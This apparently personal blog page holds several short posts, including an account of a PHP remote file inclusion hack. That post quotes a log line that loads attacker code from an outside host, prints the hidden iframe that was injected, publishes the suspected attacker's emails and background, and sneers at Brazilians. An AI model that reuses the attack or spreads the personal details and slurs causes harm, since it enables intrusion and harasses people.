soledad penadés

repeat 4[fd 100 rt 90]

Would you please play a fucking riff for me?
Oh, excuse me… :D

INXS Live Baby Live tour, (Old) Wembley Stadium, London, 1991

Best. Band. Ever.

(Sorries to Coldplay and U2 fans!)

As I have been using a mac for more than one year, I considered that it was the time to start using superadvanced tools for savvy users, as for example Quicksilver. It's 10 minutes since I installed it and I must say this:

1. The installation process is so full of nice transitions that it deserves to be installed just to see them
2. It's quick! It does not work exactly as Spotlight (I doubt it indexes file contents as Spotlight), but it feels fast, and launchs applications faster than Spotlight (which is the main use I give to Spotlight)
3. I absolutely love the configuration options, where it refers to the effects as "Superfluous visual effects". This kind of honesty has not been seen for a long time. Funnier enough, although they may be superfluous, they really look cool and don't annoy you as the usual effects you see in other applications.
   

There is more info for beginners in blogs like TUAW: Getting Started with Quicksilver: understanding the basics, just in case you feel curious.

We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?

I took a look at the server logs for every domain. I was looking for a POST request, since I figured out that it must had been some script kiddie trying to break into our pages with this dumb method. In little time I found that, something as suspicious as the following:

201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"

If you open the included url (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as php by the script in neonv2, hence adding all the code that he put on that file available to him. (Obviously we have fixed it immediately and you can't do it anymore). Also, the page for server itself is related to animal huntings, which is completely offtopic. Weird…
That code (take a look, it won't open any pop up… it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just explode it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.
The question is why did this idiot add this piece of html to every page and script? Not for becaming famous since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added a code like this:

iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …

This code apparently belongs to an affiliates programme (sited in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:

• submitting security announcements (which curiously corresponds to the same description of the vulnerabilities he explodes for earning money)
• signing up in gmail (soauker@gmail.com)
• writing in forums defending the hackers against the system, also providing another e-mail address: jpfg@zipmail.com.br. This address could correspond to his real name initials.

It is easy to confirm that both soauker's are the same even if they don't have the same e-mail addresses because he still uses "Adivinha seuburro" as faked name, both in the security announcement and in this forum post as well. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. All matches.

There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which still are referred to linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy which studied there on 2004 and was deeply interested in hacking and *nix systems.

So brazilians hadn't enough with spamming our nice orkut's scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous…

It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.

Final advice: always always always filter input arguments for your script.

And for Soauker: GET A FUCKING LIFE!

Desde que he leído esta mañana lo de mostrar el objeto más freak que tengas en casa, estoy venga darle vueltas a ver si se me ocurre algo, pero nada. La estantería ya esta harta de que la mire, y es que no consigo encontrar nada que sea particularmente "friki" entre mis posesiones.

Así que cuando he visto el frikitest en una de estas webs proclamando el día del orgullo friki, he pensado que tal vez resolviéndolo podría resolver la duda: ¿soy friki o no? Bien, éste es el resultado:

De lo cual deduzco que NO SOY FRIKI.

Lo siento si decepciona a alguien, porque sé que hay gente que adora imaginar chicas frikis y quizá crea que soy un buen prototipo y mejor partido pero realmente viendo las preguntas del test puedo confirmar que mis sospechas estaban en lo cierto y estáis todos confundidos.

Y de hecho, me sentiré verdaderamente ofendida la próxima vez que alguien siquiera insinúe que soy friki. Algunas razones:

• Los frikis estudian idiomas, a ser posible cuanto más raros mejor. Yo en cambio no consigo aprender ningún otro idioma que no sea inglés. Y cuando trato de hablar otros idiomas, me salen acento y pronunciación ingleses. De hecho, no puedo hablar catalán sin soltar "I mean", "Sorry" y tal a mitad de frase.
• Los frikis llevan más de dos relojes. Yo ni tan siquiera llevo uno.
• Los frikis hacen cola para ver películas de culto o "importantes". A mí se me olvida ir al cine. Y nunca he hecho más de 10 minutos de cola para comprar una entrada de cine.
• No me he leído ni el Silmarilion, ni el Hobbit, ni ningún libro de Harry Potter, ni la Guía del Autoestopista Galáctico, etc…
• Soy un absoluta ignorante de los manga
• El último cómic que compré debió ser antes de empezar la universidad (1997)
• No he pintado (ni poseo) miniaturas
• Lo último que coleccioné debieron ser los puntos por utilizar la VISA, que nunca me acordé de canjear por regalos tan fantabulosos como un juego de toallas o un exprimidor a pilas.
• Los frikis no rechazan citas. Yo sí.
• Los frikis adoran hablar de su mundo freak en las citas. A mí me agobia estar hablando durante horas del mundo freak (¡razón para no aceptar una segunda cita con un friki!)
  Tampoco me cito con nadie ahora, obviamente ;)
• Los frikis se quedan sentados enfrente del ordenador durante toda una party. Yo soy la que se sienta a veces delante del ordenador.

¡Sin acritud!

:D

I was just installing an spanish language pack for some Open Source product we use, and I decided to take a look at the constants before installing:

"Cagando… por favor, espere"

Ask anyone which understands spanish. I'm still laughing! =))
Next time you get some translation packs, try to get someone which speaks that language to proofread it. It also applies to automatic translations a la Babelfish :D

UPDATE: seems like there are still a couple of sites with that wrong language pack

UPDATE v2: An example of the message! :D